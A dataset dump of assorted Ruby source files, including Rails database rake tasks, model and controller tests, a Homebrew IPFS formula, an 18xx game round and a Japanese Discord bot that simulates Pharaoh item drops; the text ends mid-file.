hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
ff1f0f59116bd66d052e29a0d3fa1d7685f16c5f | 15,909 | require 'active_record'
db_namespace = namespace :db do
task :load_config do
ActiveRecord::Base.configurations = ActiveRecord::Tasks::DatabaseTasks.database_configuration || {}
ActiveRecord::Migrator.migrations_paths = ActiveRecord::Tasks::DatabaseTasks.migrations_paths
end
namespace :create do
task :all => :load_config do
ActiveRecord::Tasks::DatabaseTasks.create_all
end
end
desc 'Creates the database from DATABASE_URL or config/database.yml for the current RAILS_ENV (use db:create:all to create all databases in the config). Without RAILS_ENV it defaults to creating the development and test databases.'
task :create => [:load_config] do
ActiveRecord::Tasks::DatabaseTasks.create_current
end
namespace :drop do
task :all => :load_config do
ActiveRecord::Tasks::DatabaseTasks.drop_all
end
end
desc 'Drops the database from DATABASE_URL or config/database.yml for the current RAILS_ENV (use db:drop:all to drop all databases in the config). Without RAILS_ENV it defaults to dropping the development and test databases.'
task :drop => [:load_config] do
ActiveRecord::Tasks::DatabaseTasks.drop_current
end
desc "Migrate the database (options: VERSION=x, VERBOSE=false, SCOPE=blog)."
task :migrate => [:environment, :load_config] do
ActiveRecord::Migration.verbose = ENV["VERBOSE"] ? ENV["VERBOSE"] == "true" : true
ActiveRecord::Migrator.migrate(ActiveRecord::Migrator.migrations_paths, ENV["VERSION"] ? ENV["VERSION"].to_i : nil) do |migration|
ENV["SCOPE"].blank? || (ENV["SCOPE"] == migration.scope)
end
db_namespace['_dump'].invoke if ActiveRecord::Base.dump_schema_after_migration
end
task :_dump do
case ActiveRecord::Base.schema_format
when :ruby then db_namespace["schema:dump"].invoke
when :sql then db_namespace["structure:dump"].invoke
else
raise "unknown schema format #{ActiveRecord::Base.schema_format}"
end
# Allow this task to be called as many times as required. An example is the
# migrate:redo task, which calls other two internally that depend on this one.
db_namespace['_dump'].reenable
end
namespace :migrate do
# desc 'Rollbacks the database one migration and re migrate up (options: STEP=x, VERSION=x).'
task :redo => [:environment, :load_config] do
if ENV['VERSION']
db_namespace['migrate:down'].invoke
db_namespace['migrate:up'].invoke
else
db_namespace['rollback'].invoke
db_namespace['migrate'].invoke
end
end
# desc 'Resets your database using your migrations for the current environment'
task :reset => ['db:drop', 'db:create', 'db:migrate']
# desc 'Runs the "up" for a given migration VERSION.'
task :up => [:environment, :load_config] do
version = ENV['VERSION'] ? ENV['VERSION'].to_i : nil
raise 'VERSION is required' unless version
ActiveRecord::Migrator.run(:up, ActiveRecord::Migrator.migrations_paths, version)
db_namespace['_dump'].invoke
end
# desc 'Runs the "down" for a given migration VERSION.'
task :down => [:environment, :load_config] do
version = ENV['VERSION'] ? ENV['VERSION'].to_i : nil
raise 'VERSION is required - To go down one migration, run db:rollback' unless version
ActiveRecord::Migrator.run(:down, ActiveRecord::Migrator.migrations_paths, version)
db_namespace['_dump'].invoke
end
desc 'Display status of migrations'
task :status => [:environment, :load_config] do
unless ActiveRecord::Base.connection.table_exists?(ActiveRecord::Migrator.schema_migrations_table_name)
puts 'Schema migrations table does not exist yet.'
next # means "return" for rake task
end
db_list = ActiveRecord::Base.connection.select_values("SELECT version FROM #{ActiveRecord::Migrator.schema_migrations_table_name}")
db_list.map! { |version| "%.3d" % version }
file_list = []
ActiveRecord::Migrator.migrations_paths.each do |path|
Dir.foreach(path) do |file|
# match "20091231235959_some_name.rb" and "001_some_name.rb" pattern
if match_data = /^(\d{3,})_(.+)\.rb$/.match(file)
status = db_list.delete(match_data[1]) ? 'up' : 'down'
file_list << [status, match_data[1], match_data[2].humanize]
end
end
end
db_list.map! do |version|
['up', version, '********** NO FILE **********']
end
# output
puts "\ndatabase: #{ActiveRecord::Base.connection_config[:database]}\n\n"
puts "#{'Status'.center(8)} #{'Migration ID'.ljust(14)} Migration Name"
puts "-" * 50
(db_list + file_list).sort_by {|migration| migration[1]}.each do |migration|
puts "#{migration[0].center(8)} #{migration[1].ljust(14)} #{migration[2]}"
end
puts
end
end
desc 'Rolls the schema back to the previous version (specify steps w/ STEP=n).'
task :rollback => [:environment, :load_config] do
step = ENV['STEP'] ? ENV['STEP'].to_i : 1
ActiveRecord::Migrator.rollback(ActiveRecord::Migrator.migrations_paths, step)
db_namespace['_dump'].invoke
end
# desc 'Pushes the schema to the next version (specify steps w/ STEP=n).'
task :forward => [:environment, :load_config] do
step = ENV['STEP'] ? ENV['STEP'].to_i : 1
ActiveRecord::Migrator.forward(ActiveRecord::Migrator.migrations_paths, step)
db_namespace['_dump'].invoke
end
# desc 'Drops and recreates the database from db/schema.rb for the current environment and loads the seeds.'
task :reset => [:environment, :load_config] do
db_namespace["drop"].invoke
db_namespace["setup"].invoke
end
# desc "Retrieves the charset for the current environment's database"
task :charset => [:environment, :load_config] do
puts ActiveRecord::Tasks::DatabaseTasks.charset_current
end
# desc "Retrieves the collation for the current environment's database"
task :collation => [:environment, :load_config] do
begin
puts ActiveRecord::Tasks::DatabaseTasks.collation_current
rescue NoMethodError
$stderr.puts 'Sorry, your database adapter is not supported yet. Feel free to submit a patch.'
end
end
desc 'Retrieves the current schema version number'
task :version => [:environment, :load_config] do
puts "Current version: #{ActiveRecord::Migrator.current_version}"
end
# desc "Raises an error if there are pending migrations"
task :abort_if_pending_migrations => :environment do
pending_migrations = ActiveRecord::Migrator.open(ActiveRecord::Migrator.migrations_paths).pending_migrations
if pending_migrations.any?
puts "You have #{pending_migrations.size} pending #{pending_migrations.size > 1 ? 'migrations:' : 'migration:'}"
pending_migrations.each do |pending_migration|
puts ' %4d %s' % [pending_migration.version, pending_migration.name]
end
abort %{Run `rake db:migrate` to update your database then try again.}
end
end
desc 'Create the database, load the schema, and initialize with the seed data (use db:reset to also drop the database first)'
task :setup => ['db:schema:load_if_ruby', 'db:structure:load_if_sql', :seed]
desc 'Load the seed data from db/seeds.rb'
task :seed do
db_namespace['abort_if_pending_migrations'].invoke
ActiveRecord::Tasks::DatabaseTasks.load_seed
end
namespace :fixtures do
desc "Load fixtures into the current environment's database. Load specific fixtures using FIXTURES=x,y. Load from subdirectory in test/fixtures using FIXTURES_DIR=z. Specify an alternative path (eg. spec/fixtures) using FIXTURES_PATH=spec/fixtures."
task :load => [:environment, :load_config] do
require 'active_record/fixtures'
base_dir = if ENV['FIXTURES_PATH']
File.join [Rails.root, ENV['FIXTURES_PATH'] || %w{test fixtures}].flatten
else
ActiveRecord::Tasks::DatabaseTasks.fixtures_path
end
fixtures_dir = File.join [base_dir, ENV['FIXTURES_DIR']].compact
(ENV['FIXTURES'] ? ENV['FIXTURES'].split(/,/) : Dir["#{fixtures_dir}/**/*.yml"].map {|f| f[(fixtures_dir.size + 1)..-5] }).each do |fixture_file|
ActiveRecord::FixtureSet.create_fixtures(fixtures_dir, fixture_file)
end
end
# desc "Search for a fixture given a LABEL or ID. Specify an alternative path (eg. spec/fixtures) using FIXTURES_PATH=spec/fixtures."
task :identify => [:environment, :load_config] do
require 'active_record/fixtures'
label, id = ENV['LABEL'], ENV['ID']
raise 'LABEL or ID required' if label.blank? && id.blank?
puts %Q(The fixture ID for "#{label}" is #{ActiveRecord::FixtureSet.identify(label)}.) if label
base_dir = if ENV['FIXTURES_PATH']
File.join [Rails.root, ENV['FIXTURES_PATH'] || %w{test fixtures}].flatten
else
ActiveRecord::Tasks::DatabaseTasks.fixtures_path
end
Dir["#{base_dir}/**/*.yml"].each do |file|
if data = YAML::load(ERB.new(IO.read(file)).result)
data.keys.each do |key|
key_id = ActiveRecord::FixtureSet.identify(key)
if key == label || key_id == id.to_i
puts "#{file}: #{key} (#{key_id})"
end
end
end
end
end
end
namespace :schema do
desc 'Create a db/schema.rb file that is portable against any DB supported by AR'
task :dump => [:environment, :load_config] do
require 'active_record/schema_dumper'
filename = ENV['SCHEMA'] || File.join(ActiveRecord::Tasks::DatabaseTasks.db_dir, 'schema.rb')
File.open(filename, "w:utf-8") do |file|
ActiveRecord::SchemaDumper.dump(ActiveRecord::Base.connection, file)
end
db_namespace['schema:dump'].reenable
end
desc 'Load a schema.rb file into the database'
task :load => [:environment, :load_config] do
ActiveRecord::Tasks::DatabaseTasks.load_schema(:ruby, ENV['SCHEMA'])
end
task :load_if_ruby => ['db:create', :environment] do
db_namespace["schema:load"].invoke if ActiveRecord::Base.schema_format == :ruby
end
namespace :cache do
desc 'Create a db/schema_cache.dump file.'
task :dump => [:environment, :load_config] do
con = ActiveRecord::Base.connection
filename = File.join(ActiveRecord::Tasks::DatabaseTasks.db_dir, "schema_cache.dump")
con.schema_cache.clear!
con.tables.each { |table| con.schema_cache.add(table) }
open(filename, 'wb') { |f| f.write(Marshal.dump(con.schema_cache)) }
end
desc 'Clear a db/schema_cache.dump file.'
task :clear => [:environment, :load_config] do
filename = File.join(ActiveRecord::Tasks::DatabaseTasks.db_dir, "schema_cache.dump")
FileUtils.rm(filename) if File.exist?(filename)
end
end
end
namespace :structure do
desc 'Dump the database structure to db/structure.sql. Specify another file with DB_STRUCTURE=db/my_structure.sql'
task :dump => [:environment, :load_config] do
filename = ENV['DB_STRUCTURE'] || File.join(ActiveRecord::Tasks::DatabaseTasks.db_dir, "structure.sql")
current_config = ActiveRecord::Tasks::DatabaseTasks.current_config
ActiveRecord::Tasks::DatabaseTasks.structure_dump(current_config, filename)
if ActiveRecord::Base.connection.supports_migrations? &&
ActiveRecord::SchemaMigration.table_exists?
File.open(filename, "a") do |f|
f.puts ActiveRecord::Base.connection.dump_schema_information
f.print "\n"
end
end
db_namespace['structure:dump'].reenable
end
# desc "Recreate the databases from the structure.sql file"
task :load => [:environment, :load_config] do
ActiveRecord::Tasks::DatabaseTasks.load_schema(:sql, ENV['DB_STRUCTURE'])
end
task :load_if_sql => ['db:create', :environment] do
db_namespace["structure:load"].invoke if ActiveRecord::Base.schema_format == :sql
end
end
namespace :test do
task :deprecated do
Rake.application.top_level_tasks.grep(/^db:test:/).each do |task|
$stderr.puts "WARNING: #{task} is deprecated. The Rails test helper now maintains " \
"your test schema automatically, see the release notes for details."
end
end
# desc "Recreate the test database from the current schema"
task :load => %w(db:test:deprecated db:test:purge) do
case ActiveRecord::Base.schema_format
when :ruby
db_namespace["test:load_schema"].invoke
when :sql
db_namespace["test:load_structure"].invoke
end
end
# desc "Recreate the test database from an existent schema.rb file"
task :load_schema => %w(db:test:deprecated db:test:purge) do
begin
should_reconnect = ActiveRecord::Base.connection_pool.active_connection?
ActiveRecord::Base.establish_connection(ActiveRecord::Base.configurations['test'])
ActiveRecord::Schema.verbose = false
db_namespace["schema:load"].invoke
ensure
if should_reconnect
ActiveRecord::Base.establish_connection(ActiveRecord::Base.configurations[ActiveRecord::Tasks::DatabaseTasks.env])
end
end
end
# desc "Recreate the test database from an existent structure.sql file"
task :load_structure => %w(db:test:deprecated db:test:purge) do
begin
ActiveRecord::Tasks::DatabaseTasks.current_config(:config => ActiveRecord::Base.configurations['test'])
db_namespace["structure:load"].invoke
ensure
ActiveRecord::Tasks::DatabaseTasks.current_config(:config => nil)
end
end
# desc "Recreate the test database from a fresh schema"
task :clone => %w(db:test:deprecated environment) do
case ActiveRecord::Base.schema_format
when :ruby
db_namespace["test:clone_schema"].invoke
when :sql
db_namespace["test:clone_structure"].invoke
end
end
# desc "Recreate the test database from a fresh schema.rb file"
task :clone_schema => %w(db:test:deprecated db:schema:dump db:test:load_schema)
# desc "Recreate the test database from a fresh structure.sql file"
task :clone_structure => %w(db:test:deprecated db:structure:dump db:test:load_structure)
# desc "Empty the test database"
task :purge => %w(db:test:deprecated environment load_config) do
ActiveRecord::Tasks::DatabaseTasks.purge ActiveRecord::Base.configurations['test']
end
# desc 'Check for pending migrations and load the test schema'
task :prepare => %w(db:test:deprecated environment load_config) do
unless ActiveRecord::Base.configurations.blank?
db_namespace['test:load'].invoke
end
end
end
end
namespace :railties do
namespace :install do
# desc "Copies missing migrations from Railties (e.g. engines). You can specify Railties to use with FROM=railtie1,railtie2"
task :migrations => :'db:load_config' do
to_load = ENV['FROM'].blank? ? :all : ENV['FROM'].split(",").map {|n| n.strip }
railties = {}
Rails.application.railties.each do |railtie|
next unless to_load == :all || to_load.include?(railtie.railtie_name)
if railtie.respond_to?(:paths) && (path = railtie.paths['db/migrate'].first)
railties[railtie.railtie_name] = path
end
end
on_skip = Proc.new do |name, migration|
puts "NOTE: Migration #{migration.basename} from #{name} has been skipped. Migration with the same name already exists."
end
on_copy = Proc.new do |name, migration|
puts "Copied migration #{migration.basename} from #{name}"
end
ActiveRecord::Migration.copy(ActiveRecord::Migrator.migrations_paths.first, railties,
:on_skip => on_skip, :on_copy => on_copy)
end
end
end
| 40.68798 | 253 | 0.679992 |
18d50ce0face0b84fc3ab8668e7e559162b09bf5 | 190 | require 'rails_helper'
module SponsoredBenefits
RSpec.describe BenefitCatalogs::AcaShopHealthProduct, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
end
| 23.75 | 71 | 0.773684 |
0813dbdcef793893ddc0f1be76d9eeb2976a0a08 | 742 | Pod::Spec.new do |s|
s.name = 'facebook_app_events'
s.version = '0.0.1'
s.summary = 'Flutter plugin for Facebook Analytics and App Events'
s.description = <<-DESC
Flutter plugin for Facebook Analytics and App Events
DESC
s.homepage = 'https://github.com/Shahmirzali-Huseynov/facebook_addEvent'
s.license = { :file => '../LICENSE' }
s.author = { 'Oddbit Team' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'Flutter'
s.dependency 'FBSDKCoreKit', '~> 11.1.0'
s.swift_version = '5.0'
s.ios.deployment_target = '9.0'
end
| 37.1 | 82 | 0.572776 |
bbd638524022d706aaaf60de156cfa5fbc8194ab | 119 | class Welcome < ActiveRecord::Base
validates_presence_of :name, :password
def self.some_method(id)
find(id)
end
end
| 11.9 | 38 | 0.781513 |
edb7e7c048acc832b8bab3f0d98bdd655f9fa5a6 | 1,493 | class Ipfs < Formula
desc "Peer-to-peer hypermedia protocol"
homepage "https://ipfs.io/"
url "https://github.com/ipfs/go-ipfs.git",
:tag => "v0.4.18",
:revision => "aefc746f34e5ffdee5fba1915c6603b65a0ebf81"
head "https://github.com/ipfs/go-ipfs.git"
bottle do
cellar :any_skip_relocation
sha256 "338d2a56d12e905ae6916df9aedce66068cfa9368054b5c7d4bdb9877e0c2b06" => :mojave
sha256 "cd05be50fbf6162d208bfbe5300accfa1a08abc7ec2a2230621afbb5319f8491" => :high_sierra
sha256 "b3a9d6f5e74876b0081193a690e470d94d56c290e67e444cfdda67603b85518a" => :sierra
end
depends_on "go" => :build
depends_on "godep" => :build
depends_on "gx"
depends_on "gx-go"
def install
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/ipfs/go-ipfs").install buildpath.children
cd("src/github.com/ipfs/go-ipfs") { system "make", "install" }
bin.install "bin/ipfs"
end
plist_options :manual => "ipfs daemon"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/ipfs</string>
<string>daemon</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
system bin/"ipfs", "version"
end
end
| 28.169811 | 106 | 0.659745 |
38e14e9cd5b49d2651f36ae51b14163f8b8d428c | 746 | # rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: site_announcements
#
# id :integer not null, primary key
# description :text
# image_url :string
# link :string
# title :string not null
# created_at :datetime not null
# updated_at :datetime not null
# user_id :integer not null
#
# Foreign Keys
#
# fk_rails_725ca0b80c (user_id => users.id)
#
# rubocop:enable Metrics/LineLength
class SiteAnnouncement < ApplicationRecord
include WithActivity
include DescriptionSanitation
belongs_to :user, required: true
validates :title, presence: true
def stream_activity
SiteAnnouncementsGlobalFeed.new.activities.new
end
end
| 22.606061 | 54 | 0.680965 |
391514dcb57ede09cd30b19141f8c17bea00f300 | 443 | class FixColumnNames < ActiveRecord::Migration[5.1]
def change
rename_column :submission_reviews, :abstractId, :submission_id
rename_column :submission_reviews, :presentationQuality, :presentation_quality
rename_column :submission_reviews, :publicContent, :public_content
rename_column :submission_reviews, :reviewerId, :reviewer_id
rename_column :submission_reviews, :conflictOfInterest, :conflict_of_interest
end
end
| 44.3 | 82 | 0.812641 |
0183e11a95ad176a80d26636bb63371e35b932fc | 1,436 | require 'test_helper'
class WorkSchedulesControllerTest < ActionDispatch::IntegrationTest
setup do
@work_schedule = work_schedules(:one)
end
test "should get index" do
get work_schedules_url
assert_response :success
end
test "should get new" do
get new_work_schedule_url
assert_response :success
end
test "should create work_schedule" do
assert_difference('WorkSchedule.count') do
post work_schedules_url, params: { work_schedule: { day: @work_schedule.day, end_work: @work_schedule.end_work, start_work: @work_schedule.start_work, user_id: @work_schedule.user_id } }
end
assert_redirected_to work_schedule_url(WorkSchedule.last)
end
test "should show work_schedule" do
get work_schedule_url(@work_schedule)
assert_response :success
end
test "should get edit" do
get edit_work_schedule_url(@work_schedule)
assert_response :success
end
test "should update work_schedule" do
patch work_schedule_url(@work_schedule), params: { work_schedule: { day: @work_schedule.day, end_work: @work_schedule.end_work, start_work: @work_schedule.start_work, user_id: @work_schedule.user_id } }
assert_redirected_to work_schedule_url(@work_schedule)
end
test "should destroy work_schedule" do
assert_difference('WorkSchedule.count', -1) do
delete work_schedule_url(@work_schedule)
end
assert_redirected_to work_schedules_url
end
end
| 29.306122 | 206 | 0.761838 |
9133a942c156da27c4d5ed1dcf7a7e1755a3f3d9 | 462 | # frozen_string_literal: true
# == Schema Information
#
# Table name: images
#
# id :integer not null, primary key
# image :string
# md5 :string
# created_at :datetime not null
# updated_at :datetime not null
#
class Image < ApplicationRecord
mount_uploader :image, ImageUploader
validates :md5, uniqueness: true
before_validation do
self.md5 = Digest::MD5.hexdigest image.file.read.to_s
end
end
| 20.086957 | 57 | 0.660173 |
bf3c9f33ab264e2b37f64e586a1efa0f8231c160 | 942 | require_relative '../lib/jsontocsv.rb'
URL = "https://gist.githubusercontent.com/romsssss/6b8bc16cfd015e2587ef6b4c5ee0f232/raw/f74728a6ac05875dafb882ae1ec1deaae4d0ed4b/users.json"
RSpec.describe Jsontocsv do
describe '#fetch_content' do
it 'should return a data string' do
first_object = JsonToConvert.new(URL)
expect(first_object.fetch_content(URL)).to be_a String
end
end
describe '#content_parser' do
it 'should not have hashes in a hash' do
first_object = JsonToConvert.new(URL)
response = first_object.fetch_content(URL)
data = first_object.content_parser(response).first
data.each do |k, v|
expect(v).not_to be_a Hash
end
end
end
describe '#create_or_update_csv' do
it "Create a csv file" do
a = JsonToConvert.new(URL)
a.convert_json_to_csv
expect(a).to be_a_kind_of(Object)
expect(File).to exist("./file.csv")
end
end
end | 29.4375 | 140 | 0.705945 |
6a05db055c7f8355f6468b66357de8af64562687 | 2,304 | # frozen_string_literal: true
require_relative '../../../round/operating'
require_relative '../../../step/buy_train'
module Engine
module Game
module G1817
module Round
class Operating < Engine::Round::Operating
attr_accessor :cash_crisis_player
attr_reader :paid_loans
def setup
@paid_loans = {}
@game.payout_companies
after_setup
end
def after_process(action)
# Keep track of last_player for Cash Crisis
entity = @entities[@entity_index]
@cash_crisis_player = entity.player
pay_interest!(entity)
if !active_step && entity.operator? && entity.trains.empty?
@log << "#{entity.name} has no trains and liquidates"
@game.liquidate!(entity)
end
super
end
def start_operating
entity = @entities[@entity_index]
if entity.share_price.liquidation?
# Skip entities that have gone into liquidation due to bankrupcy.
next_entity!
else
super
end
end
def pay_interest!(entity)
@cash_crisis_due_to_interest = nil
return if @paid_loans[entity]
return unless @steps.any? { |step| step.passed? && step.is_a?(Engine::Step::BuyTrain) }
@paid_loans[entity] = true
return if entity.loans.empty?
bank = @game.bank
return unless (owed = @game.pay_interest!(entity))
owed_fmt = @game.format_currency(owed)
owner = entity.owner
@game.liquidate!(entity)
transferred = ''
if entity.cash.positive?
transferred = ", transferring #{@game.format_currency(entity.cash)} to #{owner.name}"
entity.spend(entity.cash, owner)
end
@log << "#{entity.name} cannot afford #{owed_fmt} interest and goes into liquidation#{transferred}"
owner.spend(owed, bank, check_cash: false)
@cash_crisis_due_to_interest = entity
@log << "#{owner.name} pays #{owed_fmt} interest for #{entity.loans.size} loans"
end
end
end
end
end
end
| 29.922078 | 111 | 0.560764 |
1c3cdaf6ad2067d73f90322ad34ba360d9d36788 | 1,268 | describe ActivityNotification::Config do
describe "config.mailer" do
let(:notification) { create(:notification) }
context "as default" do
it "is configured with ActivityNotification::Mailer" do
expect(ActivityNotification::Mailer).to receive(:send_notification_email).and_call_original
notification.send_notification_email send_later: false
end
it "is not configured with CustomNotificationMailer" do
expect(CustomNotificationMailer).not_to receive(:send_notification_email).and_call_original
notification.send_notification_email send_later: false
end
end
context "when it is configured with CustomNotificationMailer" do
before do
ActivityNotification.config.mailer = 'CustomNotificationMailer'
ActivityNotification::Notification.set_notification_mailer
end
after do
ActivityNotification.config.mailer = 'ActivityNotification::Mailer'
ActivityNotification::Notification.set_notification_mailer
end
it "is configured with CustomMailer" do
expect(CustomNotificationMailer).to receive(:send_notification_email).and_call_original
notification.send_notification_email send_later: false
end
end
end
end
| 36.228571 | 99 | 0.747634 |
bba58c42f50c83e65ad19de23995f5062892e777 | 798 | #
# Cookbook Name:: collectd
# Recipe:: _server_logrotate
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
include_recipe 'logrotate::default'
logrotate_app 'collectd_logs' do
cookbook 'logrotate'
path node['collectd']['log_dir']
frequency 'daily'
rotate '30'
create '644 root root'
end
| 29.555556 | 74 | 0.750627 |
ff53083c2f5479d290134866128efcfc3f95aa3e | 830 | require_relative "helper"
require "tempfile"
class TestFileCache < MiniTest::Test
def with_tempfile(&block)
Tempfile.open(File.basename(__FILE__), &block)
end
def with_temp_path
with_tempfile do |file|
path = file.path
begin
file.close!
yield path
ensure
File.delete(path)
end
end
end
def test_save
with_temp_path do |path|
cache = Rets::Metadata::FileCache.new(path)
cache.save { |file| file.print "foo" }
file_contents = File.read(path)
assert_equal "foo", file_contents
end
end
def test_load
with_tempfile do |file|
file.print "foo"
file.close
cache = Rets::Metadata::FileCache.new(file.path)
file_contents = cache.load(&:read)
assert_equal "foo", file_contents
end
end
end
| 19.302326 | 54 | 0.637349 |
337b0aacbb52685d26e2fb7b77db94c4c5b194ab | 455 | module ExploreHelper
def filter_projects_path(options={})
exist_opts = {
sort: params[:sort],
scope: params[:scope],
group: params[:group],
tag: params[:tag],
visibility_level: params[:visibility_level],
}
options = exist_opts.merge(options)
path = request.path
path << "?#{options.to_param}"
path
end
def explore_controller?
controller.class.name.split("::").first == "Explore"
end
end
| 21.666667 | 56 | 0.632967 |
4a0f726684b9010bceaba6e2cc41a661875612bd | 1,158 | require "rails/generators/migration"
require "generators/typus/config_generator"
require "generators/typus/controller_generator"
require "generators/typus/initializers_generator"
module Typus
module Generators
class TypusGenerator < Rails::Generators::Base
include Rails::Generators::Migration
source_root File.expand_path("../../templates", __FILE__)
namespace "typus"
desc <<-DESC
Description:
This generator creates required files to enable an admin panel which allows
trusted users to edit structured content.
To enable session authentication run `rails generate typus:migration`.
DESC
def generate_initializers
Typus::Generators::InitializersGenerator.new.invoke_all
end
def generate_controllers
Typus.application_models.each do |model|
Typus::Generators::ControllerGenerator.new([model.pluralize]).invoke_all
end
end
def generate_config
Typus::Generators::ConfigGenerator.new.invoke_all
end
protected
def resource
@resource
end
def sidebar
@sidebar
end
end
end
end
| 21.849057 | 82 | 0.702073 |
ff8be5de148e19d282390e62390025b5925348c2 | 23,532 | # coding: utf-8
require 'discordrb'
require 'date'
require 'kconv'
require 'bigdecimal'
require 'json'
require 'sequel'
require 'sqlite3'
require 'logger'
require "ostruct"
# 設定ファイル読み込み
@setting_auth = open('./settings/auth.json') do |io|
JSON.load(io)
end
@setting_farao= open('./settings/farao.json') do |io|
JSON.load(io)
end
@setting_tablet = open('./settings/tablet.json') do |io|
JSON.load(io)
end
#定数の設定
#ドロップ倍率
DROPRATIO = @setting_farao['dropRatio']
#メッセージ通知チャンネル
CHANNELID = @setting_auth['bot']['channel_id']
#ドロップアイテムの絵文字コード
EMOJDROP1 = @setting_farao['drop1']['emoji']
EMOJDROP2 = @setting_farao['drop2']['emoji']
EMOJDROP3 = @setting_farao['drop3']['emoji']
EMOJDROP4 = @setting_farao['drop4']['emoji']
EMOJDROP5 = @setting_farao['drop5']['emoji']
EMOJDROP6 = @setting_farao['drop6']['emoji']
EMOJDROP7 = @setting_farao['drop7']['emoji']
EMOJDROP8 = @setting_farao['drop8']['emoji']
EMOJDROP9 = @setting_farao['drop9']['emoji']
EMOJDROPEX = @setting_farao['dropEx']['emoji']
EMOJDROPEX2 = @setting_farao['dropEx2']['emoji']
EMOJFARAO = @setting_farao['farao']['emoji']
EMOJNODROP = @setting_farao['noDrop']['emoji']
#ドロップアイテムのドロップ率
BORDERDROP1 = @setting_farao['drop1']['border']
BORDERDROP2 = @setting_farao['drop2']['border']
BORDERDROP3 = @setting_farao['drop3']['border']
BORDERDROP4 = @setting_farao['drop4']['border']
BORDERDROP5 = @setting_farao['drop5']['border']
BORDERDROP6 = @setting_farao['drop6']['border']
BORDERDROP7 = @setting_farao['drop7']['border']
BORDERDROP8 = @setting_farao['drop8']['border']
BORDERDROP9 = @setting_farao['drop9']['border']
BORDERDROPEX = @setting_farao['dropEx']['border']
#精錬成功率
SEIREN = @setting_tablet['seiren']
#ファイルパス
FILELOCK = @setting_farao['file']['lock']
FILERESULT = @setting_farao['file']['result']
FILERANK = @setting_farao['file']['rank']
FILECARD = @setting_farao['file']['card']
FILEEXP = @setting_farao['file']['exp']
FILETABLET = @setting_tablet['file']['tablet']
FILETABLIST = @setting_tablet['file']['tablist']
#ファラオ経験値
FARAOEXP = @setting_farao['exp']
#resultファイルの本日分データ初期化
@today_down = ""
@today_drop = []
@total_down = ""
@total_drop = []
@summary_day = ""
#沸き時間
faraotime = ""
now = Time.now
#Database
@db = nil
#接続先BOTの設定
bot = Discordrb::Commands::CommandBot.new \
token: @setting_auth['bot']['token'], \
client_id: @setting_auth['bot']['client_id'], \
prefix: "/", \
help_command:[:fahelp], \
command_doesnt_exist_message:"コマンドが見つかりません。\n`/fahelp`を参照してください。"
#ドロップ判定コマンド
bot.message(containing: EMOJFARAO) do |event|
#現在時刻を取得
now = Time.now
#乱数の設定
random = Random.new
#沸き時間が過ぎている場合ドロップ判定を行う
if now.strftime('%Y%m%d%H%M%S').to_i >= faraotime.to_i
#排他処理
File.open(FILELOCK, 'w') do |lock|
if lock.flock(File::LOCK_EX|File::LOCK_NB)
#討伐にかかった時間を設定
hunttime = BigDecimal((now - Time.parse(faraotime)).to_s).floor(2).to_f
hunthour = hunttime.div(3600)
huntmin = (hunttime.- hunthour * 3600).div(60)
huntsec = (hunttime - hunthour * 3600 - huntmin * 60).floor
huntmilsec = BigDecimal((hunttime - hunthour * 3600 - huntmin * 60 - huntsec).to_s).floor(2).to_f
hunttext = ""
if hunthour > 0
hunttext = hunthour.to_s + "時間"
end
if huntmin > 0 || hunttext != ""
hunttext = hunttext + huntmin.to_s + "分"
end
hunttext = hunttext + huntsec.to_s + "秒"
hunttext = hunttext + ((huntmilsec * 100).floor).to_s
#MVP文を設定
mvp = event.user.display_name + ":おめでとうございます、MVPです!! 討伐時間:" + hunttext + "\n"
#resultファイルから討伐数とドロップ数を取得
File.open(FILERESULT, 'r') do |f1|
@today_down = f1.gets
@today_drop = f1.gets.split(",")
@total_down = f1.gets
@total_drop = f1.gets.split(",")
end
#rankファイルからランキングデータを取得
rank = []
File.open(FILERANK, 'r') do |f2|
f2.each_line do |line|
rank.push(line.toutf8)
end
end
#ランキングデータから発言者のデータを取得
idx = -1
user_data = []
user_name = event.user.display_name
for i in 0..rank.length-1 do
user_data = rank[i].split(",")
if user_name == user_data[0]
idx = i
break
end
end
#ランキングデータに発言者のデータが無い場合は末尾に追加
if idx == -1
rank.push(user_name + ",0,0,0,0,0,0,0,0,0,0")
user_data = rank[rank.length - 1].split(",")
idx = rank.length - 1
end
#発言者の討伐数をカウントアップ
user_data[1] = user_data[1].to_i + 1
#ドロップ判定
rate = 10000 / DROPRATIO + 1
drop = []
card = ""
dropCount = OpenStruct.new
#壊れた錫杖
if random.rand(rate) <= BORDERDROP1
drop.push(EMOJDROP1)
@today_drop[0] = @today_drop[0].to_i + 1
@total_drop[0] = @total_drop[0].to_i + 1
user_data[2] = user_data[2].to_i + 1
dropCount.drop01 = 1
end
#ツタンカーメンマスク
if random.rand(rate) <= BORDERDROP2
if random.rand(rate) <= 50
#5%の確率で雷管表示
drop.push(EMOJDROPEX2)
else
drop.push(EMOJDROP2)
end
@today_drop[1] = @today_drop[1].to_i + 1
@total_drop[1] = @total_drop[1].to_i + 1
user_data[3] = user_data[3].to_i + 1
dropCount.drop02 = 1
end
#ジュエルクラウン
if random.rand(rate) <= BORDERDROP3
drop.push(EMOJDROP3)
@today_drop[2] = @today_drop[2].to_i + 1
@total_drop[2] = @total_drop[2].to_i + 1
user_data[4] = user_data[4].to_i + 1
dropCount.drop03 = 1
end
#タブレット
